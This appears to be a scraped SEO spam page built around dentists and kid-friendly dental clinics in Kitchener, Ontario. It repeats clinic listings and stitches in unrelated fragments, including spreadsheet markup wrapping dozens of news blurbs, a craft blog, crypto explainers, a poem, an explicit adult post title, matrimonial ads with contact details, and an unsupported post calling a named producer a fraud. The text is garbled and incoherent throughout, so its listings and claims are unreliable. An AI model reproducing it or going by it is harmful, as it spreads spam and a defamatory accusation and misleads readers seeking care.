Kid-Friendly Activities Things to Do with Kids in Elora, Ontario TripBuzz found 29 things to do with kids in or near Elora, Ontario, including 24 fun activities for kids in nearby cities within 25 miles like Kitchener, Cambridge, Caledon and Baden. Great ideas for fun things for kids to do and best places to go near Kitchener | Ontario – on FamilyDaysOut.com. Kitchener is a wonderful city in Ontario, that has plenty of things to do with kids all year round! (That’s what we like to hear!) There is so much and. Explore the most popular Kid Friendly trails near Kitchener with hand-curated trail maps and driving directions as well as detailed reviews and photos from hikers, campers and. Look no further if you are trying to find the best kids dentist in Kitchener. Smile Town has a team of experienced children's dental care experts. Number 1 Dental Clinic Near Kitchener Ontario Established dental clinic centrally located in downtown Kitchener with over 35 years serving Kitchener-Waterloo families. We would love to meet you and your family!. We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients, from children to grandparents. Locate and compare Dental Clinics &amp; Centres in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you. Locate and compare Dental Clinics &amp; Centres in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Find useful information, the address and the phone number of the local business you are looking for. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, Danube Dental. Kitchener Walk In Clinic The Laurentian Walk-In Clinic operates as a walk in clinic in Kitchener, Ontario. The clinic is located on Ottawa Street South at the Zehrs Superstore inside the Joe Fresh entrance. It is south of the Conestoga Parkway between the Fischer. Urgent Care Clinic, Kitchener, Ontario. 28 likes · 1,373 were here. Hospital Jump to Sections of this page Accessibility Help Press alt + / to open this menu Facebook. Nancy Le Denture Clinic serving the Kitchener Waterloo &amp; Cambridge area for over 20 years. We provide services for complete dentures, partial dentures, repairs, relines and other dental needs. Nancy Le Denture Clinic serving the Kitchener Waterloo partial. List of the best dental centre in Kitchener, ON. Get customer reviews ☆, prices, contact details , opening hours from Kitchener, ON based businesses with dental centre keyword. Get customer reviews ☆, prices, contact details , opening hours from Kitchener, ON based businesses with dental. Best Dentist In Kitchener Ontario See here the whole list of our best Dentists from Kitchener and their surroundings reviewed by StarOfService community from Waterloo – Ontario. Do you want to know who is in. Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the cut. complete oral dental care (cleaning) at affordable prices. If you’re apprehensive about visiting the dentist, don’t fear, we’re equipped. Q Forest Hill Dental Your Dentist in Kitchener 395 Greenbrook Dr. Suite 26 Kitchener, N2M4K1 Family oriented dental office servicing Kitchener&amp;Waterloo. The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. They face a rigorous 50-Point. is their calling card Provides a very informal environment where are patients are on a first-name basis with the dentist This approach increases. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, to be taken out as I had been told before from a previous dentist The doctor recognized that my upper teeth cause me the most embarrassment and. List of Dentists in Kitchener, Ontario. Belmont Dental Care +1 226-647-9222 564 Belmont Avenue West Unit 108B, Kitchener, Ontario N2M 5N6 Dentist 32 views Preferred Dental Clinic Near Kitchener Preferred Dental Clinic Near Kitchener Ontario Number 1 Dentist In Kitchener Ontario Landmark case in Kitchener calls Canadian sex-work laws into question – Canada’s prostitution laws are being questioned at a landmark case in Kitchener. Welcome – To Our digital office where we offer comprehensive patient care using cutting edge technology. Our Kitchener dental clinic provides services to families throughout the area, including orthodontics and pedodontic care. We start seeing children as early as. Falls public health site to open this fall – At a groundbreaking ceremony last July, officials said the new site will provide the in-house services currently offered at. Cosmetic Dental Clinic Near Kitchener Ontario 95% of our patients say they'd recommend us to friends. Get started today! Reserve an appointment online now. Dentist, cosmetic dentist, dental clinic, emergency. Dr. Hurlbut, Dr. De Miglio and their Kitchener dental team know and understand the importance. Cosmetic Dental Clinic Near Kitchener Ontario At Sherwood Dental Care – Dentist in Kitchener we take great pleasure and satisfaction in providing complete family dental care in the Kitchener and Waterloo area for all patients. Best Dentist In Kitchener Ontario. Highest Rated Dental Clinic Near Kitchener Most Popular Dental Clinic In Kitchener Most Popular Dental Clinic Near Kitchener Locating an Orthomolecular Provider. Top Dentist Near Kitchener Here is the definitive list of Kitchener’s dentists as rated by the Kitchener community. These dentists have It’s. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, Danube Dental. Highest Rated Dental Clinic In Kitchener BEST RATED » KITCHENER ON » DENTISTS The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. DANUBE DENTAL CLINIC – Dental Cleanings, Dental Fillings, Root Canal Treatments, Root Canal Re-Treatments, Surgical and Non. They also wanted to design a product that would translate from Friendliest Dental Clinic Near Kitchener Ontario cornekiuse的部落格 跳到主文 歡迎光臨cornekiuse在痞客邦的小天地 部落格全站分類：居家設計 Franklin St. North, Kitchener, near Ottawa and Franklin) 晚会时间：二月三日周六晚7pm到12am。 Parking, left side. Singapore 24-hour clinics stay open late at night and on weekends in various parts of Singapore. There are 5 24 hours clinics located near 181 Kitchener Road (S) 208533. Stanley Park Dental Centre (now known as Grand River Dental Care), proudly providing dentistry in Kitchener and Waterloo areas since 1996. Dr. Paul Tan and associates are committed to excellence in family dentistry and general dental care. We welcome new. Kid Friendly Dental Clinic Near Kitchener Ongoing breastfeeding support and nutritional information is available at our WIC Clinic, Ron Wood Family. Coloring. The west suburb of DuPage County, which was once named one of the top places to raise children across the nation, is known. Dentists &amp; Dental Clinics Kitchener, ON; Family Dentistry Kitchener, ON. Family Dentistry in Kitchener, ON (Results 1 – 20 of 169) Switch to Map. 43.3963879,-80.463123. Mi Dental. Ontario, 1606 Battler Road N2R 0C9 Kitchener (519) 894-9444. Closed. Opening Hours; midental.ca; We treat our patients the way we ourselves would like to be treated, with compassion and integrity. We strive. Looking for a dentist in Waterloo? Waterloo Smiles – best dental care clinic serving family, Cosmetic and Pediatric Dentistry in Waterloo-Kitchener, ON. Book an Appointment; call. KW Dental is your family dentist in Kitchener and Waterloo, Ontario. Contact us today to learn about our comprehensive dental services. Kids Dentist Kitchener, Ontario A pediatric dentist can offer comprehensive oral care specifically suited to the needs of your child. Just as you would take your child to a pediatrician to receive medical care, pediatric dentists undergo additional education and training to offer the highest standard of dental. KW Dental is your family dentist in Kitchener and Waterloo, Ontario. Contact us today to learn about our comprehensive dental services. Best Pediatric Dentists in Kitchener, ON – Waterloo Smiles Dentistry, Danube Dental Clinic, Smile Town, Midgley Dental, Trillium Dental Centre, Harmony Dental Care, Toothworks Fairview Park Dental, Laurelwood Family Dentistry, Kitchener ...</t>
  </si>
  <si>
    <t>Federal Reserve policymakers were deeply divided over whether to cut interest rates last month but were united in wanting to signal they were not on a preset path to more cuts, a message not likely to sit well with U.S. President Donald Trump.</t>
  </si>
  <si>
    <t>Linda Morris</t>
  </si>
  <si>
    <t>Sydney Festival artistic director Wesley Enoch and books presenter Jennifer Byrne, among others, will have a say in the funding of artistic companies across NSW.</t>
  </si>
  <si>
    <t>Quebec insurance brokerage Cadieux Beausejour Dupras Inc. has been bought by The Co-operators Group Ltd. Guelph, Ont.-based The Co-operators, Canada’s fifth-largest property and casualty insurer, announced the Cadieux Beausejour Dupras acquisition Tuesday. As a result, Cadieux Beausejour Dupras will become… The post The latest brokerage acquired by The Co-operators appeared first on Canadian Underwriter.</t>
  </si>
  <si>
    <t>Tourism is one of the biggest industries in the world—and it’s rapidly changing. Chinese travellers have overtaken Americans as the biggest spenders and nearly all regions are welcoming more tourists. Except one. Click here to subscribe to The Economist on YouTube: Daily Watch: mind-stretching short films throughout the working week. For more from Economist Films […] The post The changing face of tourism | The Economist appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Hello STAMPlorations Friends! As you've probably noticed, I'm really liking Deepti's new set Beautiful You. Playing with it the other day, I made this 'nature spirit' inspired card. Let me take you through my process of how it came about. I had this idea of wanting to achieve a bleeding watercolour look with my stamping. I did this a couple of years ago with a much larger stamp and a different type of card than I currently have in my stash hence I thought I'd try what look I could achieve with my go-to stamping card and my mixed media card. I cut 4 pieces of equal size, two from each type of card, decided where I wanted my image to be and secured the stamp to my stamping tool lid. The stamp was left in position throughout. The stamp was inked up with Cassis, Cerise and Mer Du Sud Izink inks, spritzed with water and first stamped on my go-to stamping card. There wasn't much bleeding out, only a bit of fuzziness around the edges. Using the same type of card, I inked the stamp again, but instead of spritzing the stamp with water, I spritzed the piece of card before stamping it. The result ... a rather nice almost feather like bleeding pattern. Once the pieces had tried, I simply stamped the image again using the same colours as before. Next I tried the same with my mixed media card. Looking at the results, it was almost as if they developed their own personalities. I decided to work with the above image and pair it with one of the ARTplorations Faces stencils. The initial idea was to heat emboss Foxy with pink embossing powder to help the face merge with my stamping. Unfortunately or shall I say fortunately, I didn't apply the Versamark carefully enough and ended up with a partially embossed face. It was easily remedied by carefully aligning the stencil and brushing on some of the Cerise I had used for my stamping. It added some interesting dimension to the stencilled face. The distressed edges and a sentiment from the Strong Women set finished my card off. Layering on a light coloured card base gave my card a soft and feminine look. Before I go, I wanted to give you a Heads Up on a fantastic new subscription Shery has introduced: CLICK HERE FOR DETAILS That's it from me for today. Hope my project inspired you to get creative with inks and water and try what effect you can achieve simply by using any of the card stock in your stash. Have a lovely week! hugs Monika xxx Here is What I used: Beautiful You, Strong Women, Foxy Stencil</t>
  </si>
  <si>
    <t>Michael Mendelsohn is an example of a Deceitful producer of all the time. The job that he did with the producers was unacceptable. He fooled them by changing the terms and conditions of the agreement that he was going to sign so that he can calm down his greed for money. The most aggravating part is that this, not the first time he has done it. He had fooled many persons in order to make money. Whenever Michael Mendelsohn’s name is heard to the peoples that he had fooled, a layer of wind and anger drives in them. He is a perfect example of incendiaries.Related The post Michael Mendelsohn | Fraud Producer – Dirty Cheater appeared first on Cheater Xposed - Cheater Exposed USA.</t>
  </si>
  <si>
    <t>The Lawyer X royal commission hears barrister Nicola Gobbo feared being killed if her part in helping a gangland supergrass to turn on his mates was ever revealed in court.</t>
  </si>
  <si>
    <t>Photo: Shutterstock Being a crypto investor, you must be well-aware that Bitcoin, along with most other cryptocurrencies, uses Proof of Work (PoW) mechanism for the verification of transactions on its network. This most commonly used blockchain verification method is the reason behind the various problems of Bitcoin and other currencies that use it. For one, it creates a sustainability problem because of high energy consumption during the verification process. PoW is one of the main reasons why Bitcoin mining consumes nearly 41 terawatt-hours of energy, which is equivalent to the annual power consumption of New Zealand. In such cases, Proof-of-Stake (PoS) is quickly replacing as an environment-friendly alternative to PoW. It not only limits the amount of computing power used for mining a block but also effectively resolves the security problems presented by PoW mechanism. What is Proof of Stake? Proof of Stake or generally called PoS is a blockchain consensus mechanism where block miners are selected by an algorithm based on the stakes of users. Unlike PoW, PoS doesn’t involve any competition to solve one or more complex puzzles in order to mine new blocks. Here, the users with the most stakes are selected by the algorithm on a random basis. A PoS consensus uses a computer algorithm to select the users for mining based on the number of tokens (stakes) held in the network. For instance, a user with a 50% stake in the network will be able to mine new blocks (validate transactions) in proportion to his/her stake. In theory, they can mine up to 50% of the new blocks. The selection of stakeholders/validators to validate a new block of transactions is done through a voting round where the decision depends on the number of tokens held by different participants. Benefits of PoS or Why Proof of Stake Is Important One of the primary benefits of the PoS mechanism is that the users do not have to compete with each other, as there are no puzzles or problems to solve. This means the energy consumption is substantially lower as compared to PoW consensus. Proof of stake is comparatively more secure as the miners are motivated to protect the ledger in order to protect their own interests. Also, there are serious penalties for those who try to harm or penetrate the system in any way. Many modern generation blockchains like OKCash, Titanprojects (Titan Coin), NavCoin are using Proof-Of-Stake consensus for protecting the interest of miners and making transactions more secure and energy-efficient. The use of the PoS system also increases the overall profitability of blockchain miners while reducing the cost. So, Is PoS Better than PoW? While nothing can be said for sure, after analyzing the available stats and performance of the projects using PoS, it can be said that this network types definitely sound more appealing and promising. Proof-of-Stake is certainly less operationally expensive than its counterpart, and at the same time, resolves the cost and ecological issues of traditional mining. Once the modern generation blockchain systems like ReddCoin, Neblio which utilize PoS, are launched, they will certainly help increase security and boost the energy efficiency of the mining systems. It will also aid to the speed of validation of blockchain transaction which might present a wide array of applications in a range of industries.</t>
  </si>
  <si>
    <t>/u/ChristyPotterbaby</t>
  </si>
  <si>
    <t>submitted by /u/ChristyPotterbaby [link] [comments] The post Sexy southern wife BBC DP gangbang appeared first on All Amateur Blog.</t>
  </si>
  <si>
    <t>A man is set to stand trial accused of exposing himself in a sexual manner.</t>
  </si>
  <si>
    <t>By Scott Bailey © 2015 Amber brown bristles Fletched true Sighted On the smooth straight shaft Knocked Creak of wood And leather Tense flesh Strength of arm Years Of hard work Hard life Peaked In tense flesh Aimed Deep russet red Undulating tight Over perfect form Moving with surety Strength and grace Slender neck Proud eyes High points Antlers spectacular Slow high-speed Flight True Through high trunks Ancient towers Sturdy and rough Flicking leaves Pungent smell Of spilt sap Over lazy ferns Struck Sunk deep In perfect flesh Deep russet red Covered in bright Fresh crimson Hunter Has hunted Dusk Deep red sky Flecked with sparks Orange Embers fly On aroma Of roasted flesh Venison Consumed Hunter sated For now Started awake Cold Stone and straw Shit and piss And chains A dream Of a memory Despite all A happy dream Amidst horror And darkness Weakness Flesh wasted In forgotten depths Waiting For nothing Time drips Away Into nothing Sodden straw Stronger arms Clad in chain Dragged from darkness Down cold Stone corridors Into light Hammering eyes Screams and shouts Hammering ears Then rope And wood Strong scent Of wet rope Rough against Weak neck And wood Creaking underfoot Screams and jeers A clunk Freedom from weight From the wait Exhilaration Then…… Image from Pixabay www.scottandrewbailey.uk The post Hunter appeared first on Scott Andrew Bailey.</t>
  </si>
  <si>
    <t>Garry Maddox</t>
  </si>
  <si>
    <t>Runners donned active wear, Superman suits, Elvis wigs and ballerina tutus for the 14-kilometre event, now in its 49th year.</t>
  </si>
  <si>
    <t>An Australian tourist has gone on a bizarre rampage on a busy street in Bali, before he was tied up and detained.</t>
  </si>
  <si>
    <t>While not the all-time lowest price for this bundle this price is very close to it. Great bundle for the kids! You will get: Rayman Legends Rayman Origins Rayman Raving Rabids They are also on sale separately if you only want one. Not sure if the bundle completion mechanic works with this bundle making the bundle completion price even cheaper. Enjoy!</t>
  </si>
  <si>
    <t>Police say the man’s body was found in a vehicle in Waringstown, County Down. Read more? Click here</t>
  </si>
  <si>
    <t>Three-time Rogers Cup tennis champion Serena Williams has a potential quarter-final match-up against world No. 2 Naomi Osaka of Japan this week at the Rogers Cup in Toronto. Source: Sports Business News</t>
  </si>
  <si>
    <t>Oleg Sentsov was convicted in 2015 for plotting and carrying out attacks in a controversial case. The post Russia swaps prisoners with Ukraine including filmmaker, says prosecutor appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Destiny 2 is expected to undergo a substantial reboot later this year on the release date of Shadowkeep. This will be our first opportunity to see what Bungie has in mind now that he has taken the series independently. The controversial Eververse store will still be part of it, but how does a studio like Bungie rely on microtransactions for financing? "As some have cleverly pointed out, MTX is an important part of our live-play business," says director Luke Smith in a long description of the state of Destiny 2. "I'm not going to say," MTX finances the studios 'or' pays for projects like Shadowkeep – it does not fully fund these activities. But it helps fund the ongoing development of Destiny 2 and allows us to fund creative efforts that we could not otherwise afford. "For example: the ornaments of Whisper of the Worm have been successful enough to make them profitable. [dev cost-wise] so that the mission / rewards of Zero Hour are built (this shit counts!). "</t>
  </si>
  <si>
    <t>Sydney hasn't been a happy hunting ground for the Wallabies in recent years, so getting to Perth for this weekend's Bledisloe Cup is a welcome relief for a squad looking to create history.</t>
  </si>
  <si>
    <t>Jahmel Riley used a Rambo-style knife with a 10-inch blade to stab Dennis Anderson. The post Man murdered with Rambo-style knife over cigarette refusal appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Two patent filings seek to set a precedent by naming an AI as their inventor. Read more? Click here</t>
  </si>
  <si>
    <t>Source: https://www.techspot.com/news/81642-apple-airpods-fail-get-consumer-reports-recommendation.html The Apple AirPods fail to get a Consumer Reports recommendation Considering that the Apple AirPods fit so well in the company’s ecosystem, many consumers don’t bother looking at alternatives. And while they’re not aimed at audiophiles, everyone can appreciate good sound quality from earphones that sport such a sleek form factor. Source: https://www.techspot.com/news/81642-apple-airpods-fail-get-consumer-reports-recommendation.html The post The Apple AirPods fail to get a Consumer Reports recommendation appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Before we break down Ethereum (ETH), let’s first understand the internet. Today, important information such as financial data, passwords, and personal data are stored by other people in their computers—in servers and cloud storage spaces owned by companies such as Amazon, Facebook, or Google. This setup is convenient since the companies deploy experts to secure the information and eliminate the hosting and uptime costs. Nonetheless, this is where the vulnerability comes in. It is common knowledge, that a government or any malicious hacker can access your data by gaining access to these servers. This means that they can change, leak, or steal your data. According to the creator of the Apache Web Server Brian Behlendorf, centralization of the data is the “original sin” of the internet. Such individuals believe that the internet should be decentralized, and Ethereum technology provides a solution for this challenge. Ethereum aims to remove these internet third parties. In short, it aims to build a decentralized “World Computer” to democratize the client-server model. Now let’s look at what exactly is Ethereum. Brief History Of Ethereum (ETH) Vitalik Buterin, the CEO of Ethereum, published its whitepaper in November 2013. However, it was not until January 2014 that the Ethereum platform was publicly announced. This announcement followed an Initial Coin Offering in August 2014, where they raised $18.4 million. The Olympic, Ethereum’s testnet was released in May 2015, and on July of the same year, the first stage of Ethereum’s development, “Frontier” was released. The DAO hack happened in June 2016, where $50 million worth of Ethereum was stolen which was 15% of the total Ether in circulation at the time was lost. In October the same year, Ethereum Classic forked from the original Ethereum protocol. ETH ETH is the token that is used on the Ethereum network. Currently, its trading at $219.52, with a market cap of $23,528,436,159. The circulating supply is at 107, 179, 591 ETH. What is Ethereum? Ethereum (ETH) is a decentralized, open-source, and distributed computing platform that enables the creation of smart contracts and decentralized applications, also known as dApps. Smart contracts are a piece of code that automatically executes once conditions set in an agreement are fulfilled. For instance, they can be used in the legal industry to specify the responsibilities of all parties involved in a contract, emulate the logic of contractual clauses, and specify automated flows of value. Additionally, a smart contract operates based on the ‘if’ logic. For example, if action ‘a’ happens, then ‘b’ is executed automatically. Below is an illustration of how smart contracts work. Advantages Of Smart Contracts and Decentralized Applications Autonomy: this implies that after a smart contract launches, the parties in an agreement do not have to participate anymore in the process. Auto-sufficiency: means that they can collect money, realize transactions, and spend funds to increase storage capacity and computation power. Decentralized: they are not focused on a central server, but distributed by various network points. Downtime: the decentralized applications never shut down unexpectedly and can never be switched off. Censorship: Ethereum node (computers running the protocol) are distributed around the world, thus eliminating censorship from a central authority. Fraud: the contract cannot be changed, hacked or manipulated. Third parties: the contract is autonomous, thus doesn’t need an intermediary. With these, Ethereum will enable a similar functionality globally, providing a platform where people can compete fairly to offer their services on the platform. When scrolling through a typical application store, for instance, you’ll notice several apps for fitness, banking, messaging, and even books. These applications rely on third-party services to store your confidential information, namely passwords and emails. Additionally, the choice of the applications to download is also controlled by these third parties; as they maintain and curate the specific apps, you can download. Take, for instance, a document storage application such as Goodge Docs. With the Ethereum technology, users can control the data on such applications, and all creation rights will be restored to the author. Users currently do not have control over their content/notes, and the application could be banned suddenly, temporarily taking all the notes offline. However, Ethereum gives control to the users, so that only they can make changes to the notes, instead of third parties. Theoretically, this new technology combines the control users have with their previous information with the easy-to-access information in this digital age. Each time a user makes changes to the notes, the changes are saved on each node in the network. Ethereum can decentralize any centralized service. Think about all the services that require third-party intervention in the world today. From obvious services such as loans to the voting system, regulatory compliance, and much more. Some Core Technological Blocks from Smart Contracts Cryptographic addresses and tokens: this is a mathematically, secure, and unique voucher system that allows building assets on existing blockchain. These are used as the standards for computing value or numeraire. They can be used in payment for services and goods, as well as to represent a mathematically secured identity. Virtual machine: before Ethereum (ETH) was created, the design of blockchain applications limited their operations. For instance, Bitcoin and other virtual currencies were exclusively developed to operate peer-to-peer digital currencies. As such, developers had two choices, either expand the operations of the blockchain applications, which could be time-consuming and very complicated, or create an entirely new platform. Understanding this challenge, Buterin came up with a new approach. According to Buterin, “I thought (those in the Bitcoin community) weren’t approaching the challenge in the right way. I thought they were going after individual applications; they were trying to explicitly support each use case in sort of Swiss Army Knife protocol.” He developed the Ethereum Virtual Machine, which runs on the same network. Thanks to this new platform, anyone can run a program developed from any programing language, if given enough time and memory. Additionally, with the virtual machine, it is easy to create a blockchain application. More specifically, instead of having to build an entirely new application, the machine allows the creation of thousands of applications all on one platform. Consensus algorithms: this entails agreeing on the current state of the blockchain. For instance, Ethereum blockchain reaches consensus in approximately 15 seconds, while Bitcoin blockchain is changed about once every 10 minutes. These pillars of decentralized applications technology are designed to enable smart contracts. Additionally, Ethereum platform is being used to develop other digital currencies. Thanks to the ERC20 token standards defined by Ethereum Foundation, other developers can develop their versions of the token, and raise funds with an ICO. In this case, the owners of the token set the amount they plan to raise, offer it in a crowd scale, and receive Ether in exchange. Billions of dollars have been raised by ICOs on the Ethereum platform, and one of the top digital currencies in the market, EOS, is an ERC20 token. Ethereum is among the world’s largest virtual currencies, and its technology enables the development of decentralized applications and smart contracts. The decentralized applications eliminate the need for third-party services, which can steal or change an individual’s information. Additionally, the smart contracts are efficient, as they are autonomous and auto-efficient, in that, it eliminates the need for further facilitation by the participants in an agreement.</t>
  </si>
  <si>
    <t>Melbourne-born Lynden McLaughlan, 50, died suddenly of cardiac arrest in March while visiting Lake Tahoe, California, for a ski trip with his son and two friends.</t>
  </si>
  <si>
    <t>Arsenal have provided a full team news and injury update ahead of Saturday's Premier League clash with Burnley at the Emirates Stadium.</t>
  </si>
  <si>
    <t>Laine Clark and Matt Encarnacion</t>
  </si>
  <si>
    <t>Croa are back in the top eight but they are sweating on the fitness of fullback Matt Moylan after their 18-12 NRL win over St George Illawarra.</t>
  </si>
  <si>
    <t>Another Humble Bundle full of music software. Three tiers. Tier 1: $1 US: Music Maker EDM Edition Voucher Code for Producer Planet Tier 2: $16.19 US: ACID Music Studio 10 MP3 Deluxe 19 Tier 3: $25 US: SOUND FORGE Pro 12 ACID Pro 8 Soundpool: ELECTRO TRAP Enjoy!</t>
  </si>
  <si>
    <t>The government is accused of ignoring illegal deforestation and burning in the Amazon. The post Amazon fires: Fines for environmental crimes drop under Bolsonaro appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Conor Climo had been promoting white supremacist views, the US Department of Justice says. The post Man charged in Las Vegas over bomb-making materials appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Marathon runners beat the heat in 42.2km race – Krestena Sullivan, from Kitchener, Ont., was the third-fastest marathon runner. She touched on the trails in Whitehorse. She said that Lime preferred not to extend the project. due to the Highway Traffic Act in Ontario that limit the scope of. Friendliest Dentist In Kitchener Ontario Great apartment in a century house that is a 10-minute walk to either. to a single bed), kitchenette. Preferred Dental Clinic Near Kitchener Welcome to Kitchener East Family Dental, Your Preferred Dentist in. Choose the dentist that’s right for you. On Lumino Health, you can find virtually every dentist in Kitchener-Waterloo. You can choose the best dentist for you based on the criteria you care about. Location Find a dentist near you. Whether your home or office is the. Kid Friendly Dental Clinic In Kitchener It is an excellent location and is going to bring a family-friendly atmosphere to Hobart and surrounding. For more. List of the best Family Dentistry in Kitchener, ON. Get customer reviews ☆, prices, contact details , opening hours from Kitchener, ON based businesses with Family Dentistry keyword. Get customer reviews ☆, prices, contact details , opening hours from Kitchener, ON based businesses with Family Dentistry keyword. Kitchener Dental Clinic . As stated above, Smile Town is a children’s dental clinic that only offers dental care for children. Our pediatric dental specialists are professionals with years of experience in working with the range of children’s needs and with children of all ages. Our dentists are patient and caring – and are known for creating a fun dental experience with every single visit. Best Pediatric Dentists in Kitchener, ON – Waterloo Smiles Dentistry, Danube Dental Clinic, Smile Town, Midgley Dental, Trillium Dental Centre, Harmony Dental Care, Toothworks Fairview Park Dental, Laurelwood Family Dentistry, Kitchener East. But what should have been a family-friendly celebration of the jacaranda tree in full. According to Ken, who followed in. Best Dental Clinic In Kitchener Ontario In an interview this week, project manager Gord Low said the summer opening was a "best guess estimate" at. services. 1450 Block Line Road #101, Kitchener, Ontario N2C 0A5 Dentist Closed now 31 views Danube Dental Clinic +1 519-576-8160 77 Water Street North, Kitchener, Ontario N2H 5A6 Dentist Closed now 26 views Dawson Dental Centre +1 519-742-2010 235 Ira. The Ontario Association of Children’s Aid Societies has said it no longer supports the use of Walton-Allen’s services for. Preferred Dental Clinic In Kitchener Ontario Best Dentist -&gt; Source : http://bestdentistkitchener.ca/blog/index.php/2018/12/31/preferred-dental-clinic-in-kitchener-ontario-6. Dental Specialties in Kitchener &amp; Waterloo, Ontario – We offer dental services such as emergency dentistry, general dentistry, cosmetic dentistry, Friendliest Dentist In Kitchener Ontario Friendliest Dentist In Kitchener Ontario Great apartment in a century house that is a 10-minute walk to either downtown Kitchener or Waterloo. Parking, washer/dryer, wifi, full kitchen. Simply Delicious – Restaurant in Kitchener, ON – 300 King Street East, Kitchener, Ontario. Simply Delicious Reviews April 10, 2018 Carol 5 Star rating! They have the friendliest and most accomodating staff. Their Schnitzel is humungous and one of. Kid Friendly Dental Clinic Near Kitchener Ontario Kid-friendly dentists and staff make it fun for your kids to get dental treatment and learn how to keep their teeth healthy and sparkling for life. Quality Dentist Services. Best Pediatric Dentists in Kitchener, ON – Waterloo Smiles Dentistry, Danube Dental Clinic, Smile Town, Midgley Dental, Trillium Dental Centre, Harmony Dental Care, Toothworks Fairview Park Dental, Laurelwood Family Dentistry, Kitchener East. Kid Friendly Dentist In Kitchener Ontario Elder brother’s family resident of Canada. Caste no bar. Seeks beautiful, qualified girl. WhatsApp or Call: 98550-40271. CL19055180 Canada PR Arora Gursikh teetotaller 1991 born/ 6′, B.Tech. (India). Oshawa produces some of Canada’s top musicians — but it’s running out of venues for them to play – So I think the suburbs would be a big part of why there are successful musicians coming out of these areas because they’re kids who got bored and put all. on Simcoe St. The Velvet Elvis is now a. Look no further if you are trying to find the best kids dentist in Kitchener. Smile Town has a team of experienced children's dental care experts. Cosmetic Dentist Near Kitchener Ontario Top Dentist Near Kitchener Cosmetic Dentist In Kitchener Ontario Kitchener Dentist/Dental Office. Waterloo Dentist. Cambridge Dentist,Family and Cosmetic Dentistry in Kitchener/Waterloo/Cambrdige. List of the best Cosmetic Dentistry in Kitchener, ON. Get customer reviews , prices, contact details , opening hours from Kitchener, ON based businesses with Cosmetic Dentistry keyword. Kid Friendly Dentist Near Kitchener Ontario The 35 to 55-year-olds wanted family-friendly events. in apartments near Centre in the Square and at Arrow Lofts beside th. Brides Wanted – E-mail: msk2617@gmail.com CL19053155 Wanted suitable vegetarian Dentist / Medico match for Sarswat Brahmin. (India) PG Diploma (Kitchener – Ontario) privately employed boy, seeks slim Gursikh. Top Dental Clinic In Kitchener Ontario Top Dental Clinic Near Kitchener Ontario Best Dentist In -&gt; Source : http://bestdentistkitchener.ca/blog/index.php/2019/01/09/top-dental-clinic-near-kitchener-ontario-7. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, Danube Dental. Handpicked Top 3 Dentists in Kitchener. We check reviews, ratings, reputation, history, complaints, satisfaction, trust, cost and their general excellence. DR. KYLE HORNBY, DDS 77 Water St N, Kitchener, ON N2H 5A6 Since 1970 DANUBE DENTAL CLINIC. Now, a few years ago, the Ontario provincial government invested in pain clinics. So, for example, Hamilton has very good. Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the cut?. We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients. In addition to a federal minimum wage, the seven-person panel — which included Mary Gellatly of Parkdale Community Legal. . About Dental Clinics See the best rated dentists specializing on fillings, extractions, cleaning &amp; whitening of total 72 dental clinics in Kitchener, Ontario, Canada. Compare dental clinic quality apples-to-apples on 5-star GCR Score rating. Read over 240 reviews on dental doctors. Most Popular Dental Clinic In Kitchener Ontario Laurentian Dental Voted Best Kitchener Dentist Thank you for voting Laurentian Dental as your Favourite Kitchener Dental Office in The Record, Readers’ Select Awards! We sincerely care about your teeth, your smile, and you as an individual. Our goal is to help. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, Danube Dental. Preferred Dentist In Kitchener Ontario Best Dental Clinic Near Kitchener Ontario We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients, bonding, dental implants, specialty dental services, smile makeovers and best of all – complete oral dental care (cleaning) at. Falls public health site to open this fall – In an interview this week, project manager Gord Low said the summer opening was a "best guess estimate" at. services. Top Dental Clinic Near Kitchener Ontario Best Dentist In -&gt; Source : http://bestdentistkitchener.ca/blog/index.php/2019/01/09/top-dental-clinic-near-kitchener-ontario-7/ Fairway Dental Urgent Care Clinic Kitchener Dentists -&gt; Source . Dentist Waterloo – Best dental clinic in Waterloo, Kitchener offering trusted emergency dental care services to clients. Call 5195768510 to book an appointment. Kid Friendly Dental Clinic In Kitchener Preferred Dental Clinic Near Kitchener Ontario Brides Wanted – job or abroad preferred. Two sisters married &amp; in USA &amp; Italy. CL19055180 Canada PR Arora Gursikh teetotaller 1991 born/ 6′, B.Tech. (India) PG Diploma (Kitchener – Ontario) privately employed boy, Stanley Park Dental Centre (now known as Grand River Dental Care), proudly providing dentistry in Kitchener and Waterloo areas since 1996. Dr. Paul Tan and associates are committed to excellence in family dentistry and general dental care. We welcome new. Enquire for a fast quote. Choose from 2 General Anesthesia for dental treatments Clinics in Kitchener find the best one for you. Patients of all 